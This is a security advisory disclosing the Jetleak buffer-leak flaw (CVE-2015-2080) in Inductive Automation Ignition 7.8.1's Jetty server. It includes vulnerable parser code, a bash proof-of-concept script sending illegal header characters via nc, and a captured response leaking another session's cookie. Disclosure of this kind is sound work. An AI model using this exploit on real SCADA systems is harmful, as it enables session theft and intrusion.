150 lines
No EOL
4.9 KiB
Text
150 lines
No EOL
4.9 KiB
Text
Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
|
|
Vendor: Inductive Automation
|
|
Product web page: http://www.inductiveautomation.com
|
|
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
|
|
Platform: Java
|
|
|
|
Summary: Ignition is a powerful industrial application platform with
|
|
fully integrated development tools for building SCADA, MES, and IIoT
|
|
solutions.
|
|
|
|
Desc: Remote unauthenticated atackers are able to read arbitrary data
|
|
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
|
|
When the Jetty web server receives a HTTP request, the below code is used
|
|
to parse through the HTTP headers and their associated values. The server
|
|
begins by looping through each character for a given header value and checks
|
|
the following:
|
|
|
|
- On Line 1164, the server checks if the character is printable ASCII or
|
|
not a valid ASCII character.
|
|
- On Line 1172, the server checks if the character is a space or tab.
|
|
- On Line 1175, the server checks if the character is a line feed.
|
|
- If the character is non-printable ASCII (or less than 0x20), then all
|
|
of the checks above are skipped over and the code throws an ëIllegalCharacterí
|
|
exception on line 1186, passing in the illegal character and a shared buffer.
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
|
|
---------------------------------------------------------------------------
|
|
920: protected boolean parseHeaders(ByteBuffer buffer)
|
|
921: {
|
|
[..snip..]
|
|
1163: case HEADER_VALUE:
|
|
1164: if (ch>HttpTokens.SPACE || ch<0)
|
|
1165: {
|
|
1166: _string.append((char)(0xff&ch));
|
|
1167: _length=_string.length();
|
|
1168: setState(State.HEADER_IN_VALUE);
|
|
1169: break;
|
|
1170: }
|
|
1171:
|
|
1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
|
|
1173: break;
|
|
1174:
|
|
1175: if (ch==HttpTokens.LINE_FEED)
|
|
1176: {
|
|
1177: if (_length > 0)
|
|
1178: {
|
|
1179: _value=null;
|
|
1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
|
|
1181: }
|
|
1182: setState(State.HEADER);
|
|
1183: break;
|
|
1184: }
|
|
1185:
|
|
1186: throw new IllegalCharacter(ch,buffer);
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
Microsoft Windows 7 Ultimate SP1 (EN)
|
|
Ubuntu Linux 14.04
|
|
Mac OS X
|
|
HP-UX Itanium
|
|
Jetty(9.2.z-SNAPSHOT)
|
|
Java/1.8.0_73
|
|
Java/1.8.0_66
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5306
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
|
|
|
|
CVE: CVE-2015-2080
|
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
|
|
|
|
Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
|
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
|
|
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
|
https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
|
|
|
|
|
14.01.2016
|
|
|
|
---
|
|
|
|
|
|
#######################
|
|
#!/bin/bash
|
|
|
|
#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
|
|
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
|
|
BAD=$'\a'
|
|
|
|
function normalRequest {
|
|
echo "-- Normal Request --"
|
|
|
|
nc localhost 8088 << NORMREQ
|
|
POST $RESOURCEPATH HTTP/1.1
|
|
Host: localhost
|
|
Content-Type: application/x-www-form-urlencoded;charset=utf-8
|
|
Connection: close
|
|
Content-Length: 63
|
|
|
|
NORMREQ
|
|
}
|
|
|
|
function badCookie {
|
|
echo "-- Bad Cookie --"
|
|
|
|
nc localhost 8088 << BADCOOKIE
|
|
GET $RESOURCEPATH HTTP/1.1
|
|
Host: localhost
|
|
Coo${BAD}kie: ${BAD}
|
|
|
|
BADCOOKIE
|
|
}
|
|
|
|
normalRequest
|
|
echo ""
|
|
echo ""
|
|
badCookie
|
|
|
|
#######################
|
|
|
|
|
|
|
|
Original raw analysis request via proxy using Referer:
|
|
------------------------------------------------------
|
|
|
|
GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
|
|
Host: localhost:8088
|
|
Accept: application/xml, text/xml, */*; q=0.01
|
|
X-Requested-With: XMLHttpRequest
|
|
Wicket-Ajax: true
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
|
|
Wicket-Ajax-BaseURL: config/conf.modules?51461
|
|
Referer: \x00
|
|
|
|
|
|
Response leaking part of Cookie session:
|
|
----------------------------------------
|
|
|
|
HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
|
|
Content-Length: 0
|
|
Connection: close
|
|
Server: Jetty(9.2.z-SNAPSHOT) |